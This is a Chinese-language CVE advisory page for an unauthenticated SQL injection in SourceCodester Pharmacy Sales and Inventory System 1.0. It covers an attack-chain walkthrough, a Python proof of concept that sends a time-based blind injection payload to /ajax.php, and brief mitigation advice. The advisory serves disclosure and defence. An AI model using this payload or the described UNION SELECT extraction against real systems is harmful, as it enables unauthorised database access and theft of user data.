IPBUF安全漏洞报告
English
CVE-2026-7130 CVSS 7.3 高危

CVE-2026-7130: 药房销售系统SQL注入漏洞

披露日期: 2026-04-27

漏洞信息

漏洞编号
CVE-2026-7130
漏洞类型
SQL注入
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
SourceCodester Pharmacy Sales and Inventory System 1.0

相关标签

SQL注入CVE-2026-7130SourceCodesterPharmacy Sales SystemWeb安全高危漏洞

漏洞概述

SourceCodester Pharmacy Sales and Inventory System 1.0版本存在SQL注入漏洞。该漏洞位于/ajax.php?action=delete_category接口中,由于程序未对用户输入的ID参数进行严格的过滤和验证,导致攻击者可以构造恶意SQL语句执行注入攻击。攻击者无需认证即可远程利用此漏洞,可能导致敏感数据泄露、数据篡改或服务中断。

技术细节

该漏洞属于典型的SQL注入漏洞。在SourceCodester Pharmacy Sales and Inventory System 1.0中,/ajax.php文件处理delete_category动作时,直接接收用户通过GET或POST方式提交的ID参数,并将其拼接到SQL查询语句中执行。由于缺乏预编译机制或有效的输入消毒,攻击者可以通过在ID参数中插入单引号等SQL元字符,改变原有查询逻辑。利用方式可以是布尔盲注、时间盲注或联合查询。鉴于CVSS评分为7.3(高危),且攻击无需用户交互和身份认证,攻击者可轻易遍历数据库、获取管理员密码或破坏业务数据,对系统造成严重影响。

攻击链分析

STEP 1
1. 信息收集
攻击者识别出目标系统运行的是SourceCodester Pharmacy Sales and Inventory System 1.0,并发现存在/ajax.php接口。
STEP 2
2. 漏洞探测
攻击者向/ajax.php?action=delete_category发送包含特殊字符(如单引号)的ID参数,观察服务器响应以判断是否存在SQL注入。
STEP 3
3. 漏洞利用
攻击者构造恶意的SQL语句(如UNION SELECT)注入到ID参数中,成功执行数据库查询,提取敏感信息。
STEP 4
4. 后果达成
获取数据库权限,窃取用户数据或破坏数据完整性,导致系统机密性、完整性和可用性受损。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL configuration target_url = "http://target-site.com/ajax.php" # Malicious payload to exploit the ID parameter in delete_category # Using time-based blind injection to test vulnerability payload = { "action": "delete_category", "ID": "1' AND (SELECT SLEEP(5))-- -" } try: print("Sending malicious request to target...") response = requests.get(target_url, params=payload, timeout=10) # Analyze response time if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability Confirmed: SQL Injection detected via time delay.") else: print("[-] Vulnerability not detected or payload invalid.") except Exception as e: print(f"[!] Error during exploitation: {e}")

影响范围

SourceCodester Pharmacy Sales and Inventory System 1.0

防御指南

临时缓解措施
建议通过部署Web应用防火墙(WAF)规则,拦截针对/ajax.php文件的异常请求,特别是包含SQL关键字的参数输入。在未能立即修复代码的情况下,可临时禁用该接口的访问权限以降低风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表